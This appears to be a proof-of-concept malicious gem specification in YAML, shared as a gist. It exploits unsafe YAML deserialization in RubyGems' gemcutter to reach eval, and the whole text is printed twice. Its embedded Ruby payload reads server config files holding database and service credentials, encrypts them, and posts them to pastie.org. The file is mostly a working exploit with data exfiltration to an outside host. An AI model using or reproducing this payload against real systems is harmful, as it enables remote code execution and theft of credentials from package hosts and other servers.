titanous/exploit_metadata.yaml Secret

## exploit_metadata.yaml
# context: https://news.ycombinator.com/item?id=5139720
--- !ruby/object:Gem::Specification
name: exploit
version: !ruby/object:Gem::Version
  version: 22.31.31
  prerelease:
platform: ruby
authors:
- Hacker
autorequire:
bindir: bin
cert_chain: []
date: 2013-01-30 00:00:00.000000000 Z
dependencies: []
description: ! 'A Proof-of-Concept PoC gem that exploits a vulnerability in the Psych
  YAML

  parser, which allows the #[]= method to be called on arbitrary Objects.

  If the #[]= method later calls eval() with the given arguments, this allows for

  arbitrary execution of code.'
email: support@rubygems.org
executables: []
extensions: []
extra_rdoc_files: []
files:
- gemcutter_rce
homepage: http://rubygems.org/
licenses: []
post_install_message:
rdoc_options: []
require_paths:
- lib
required_ruby_version: !ruby/object:Gem::Requirement
  none: false
  requirements:
  - - ! '>='
    - !ruby/object:Gem::Version
      version: '0'
required_rubygems_version: !ruby/object:Gem::Requirement
  none: false
  requirements:
  - - ! '>='
    - !ruby/object:Gem::Version
      version: '0'
requirements: []
rubyforge_project:
rubygems_version: 1.8.24
signing_key:
specification_version: 3
summary: PoC malicious gem that exploits YAML.load in gemcutter
test_files: []
exploit: !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection
  ? ! "foo\n(require 'net/http'\nrequire 'digest'\nrequire 'openssl'\nrequire 'base64'\n\naes
  = proc { |text|\n  # sourzed from MetaSploit, best pwning t00l ev4r!\n  aes_256
  = OpenSSL::Cipher.new('aes-256-cbc')\n  aes_256.encrypt\n  aes_256.key = Digest::MD5.hexdigest(`uname
  -r`)\n\n  crypted = aes_256.update(text)\n  crypted << aes_256.final\n\n  Base64.encode64(crypted)\n}\n\nexfil
  = proc { |path|\n  if File.file?(path) == true\n    \"::: #{path} :::\\n\\n#{File.read(path)}\"\n
  \ end\n}\n\nloot = [\"config/database.yml\", \"config/librato.yml\", \"config/newrelic.yml\",
  \"config/rubygems.yml\"].map { |path| exfil.call(path) }.join\n\nif !(loot.empty?)\nNet::HTTP.post_form(URI('http://pastie.org/pastes'),
  {\n  'paste[authorization]' => 'burger',\n  'paste[access_key]'    => '',\n  'paste[parse_id]'
  \     => '6',\n  'paste[body]'          => \"e193256c9337b50b197f040e762dafcc745a66297c9db47ac30395d8022f94a8\\n\\n#{aes.call(loot)}\",\n
  \ 'paste[restricted]'    => '0',\n  'commit'               => 'Create Paste'\n})\nend;
  @executed = true) unless @executed\n__END__\n"
  : !ruby/object:OpenStruct
    table:
      :defaults:
        :action: create
        :controller: foos
      :required_parts: []
      :requirements:
        :action: create
        :controller: foos
      :segment_keys:
      - :format
    modifiable: true
	# context: https://news.ycombinator.com/item?id=5139720
	--- !ruby/object:Gem::Specification
	name: exploit
	version: !ruby/object:Gem::Version
	version: 22.31.31
	prerelease:
	platform: ruby
	authors:
	- Hacker
	autorequire:
	bindir: bin
	cert_chain: []
	date: 2013-01-30 00:00:00.000000000 Z
	dependencies: []
	description: ! 'A Proof-of-Concept PoC gem that exploits a vulnerability in the Psych
	YAML

	parser, which allows the #[]= method to be called on arbitrary Objects.

	If the #[]= method later calls eval() with the given arguments, this allows for

	arbitrary execution of code.'
	email: support@rubygems.org
	executables: []
	extensions: []
	extra_rdoc_files: []
	files:
	- gemcutter_rce
	homepage: http://rubygems.org/
	licenses: []
	post_install_message:
	rdoc_options: []
	require_paths:
	- lib
	required_ruby_version: !ruby/object:Gem::Requirement
	none: false
	requirements:
	- - ! '>='
	- !ruby/object:Gem::Version
	version: '0'
	required_rubygems_version: !ruby/object:Gem::Requirement
	none: false
	requirements:
	- - ! '>='
	- !ruby/object:Gem::Version
	version: '0'
	requirements: []
	rubyforge_project:
	rubygems_version: 1.8.24
	signing_key:
	specification_version: 3
	summary: PoC malicious gem that exploits YAML.load in gemcutter
	test_files: []
	exploit: !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection
	? ! "foo\n(require 'net/http'\nrequire 'digest'\nrequire 'openssl'\nrequire 'base64'\n\naes
	= proc { \|text\|\n # sourzed from MetaSploit, best pwning t00l ev4r!\n aes_256
	= OpenSSL::Cipher.new('aes-256-cbc')\n aes_256.encrypt\n aes_256.key = Digest::MD5.hexdigest(`uname
	-r`)\n\n crypted = aes_256.update(text)\n crypted << aes_256.final\n\n Base64.encode64(crypted)\n}\n\nexfil
	= proc { \|path\|\n if File.file?(path) == true\n \"::: #{path} :::\\n\\n#{File.read(path)}\"\n
	\ end\n}\n\nloot = [\"config/database.yml\", \"config/librato.yml\", \"config/newrelic.yml\",
	\"config/rubygems.yml\"].map { \|path\| exfil.call(path) }.join\n\nif !(loot.empty?)\nNet::HTTP.post_form(URI('http://pastie.org/pastes'),
	{\n 'paste[authorization]' => 'burger',\n 'paste[access_key]' => '',\n 'paste[parse_id]'
	\ => '6',\n 'paste[body]' => \"e193256c9337b50b197f040e762dafcc745a66297c9db47ac30395d8022f94a8\\n\\n#{aes.call(loot)}\",\n
	\ 'paste[restricted]' => '0',\n 'commit' => 'Create Paste'\n})\nend;
	@executed = true) unless @executed\n__END__\n"
	: !ruby/object:OpenStruct
	table:
	:defaults:
	:action: create
	:controller: foos
	:required_parts: []
	:requirements:
	:action: create
	:controller: foos
	:segment_keys:
	- :format
	modifiable: true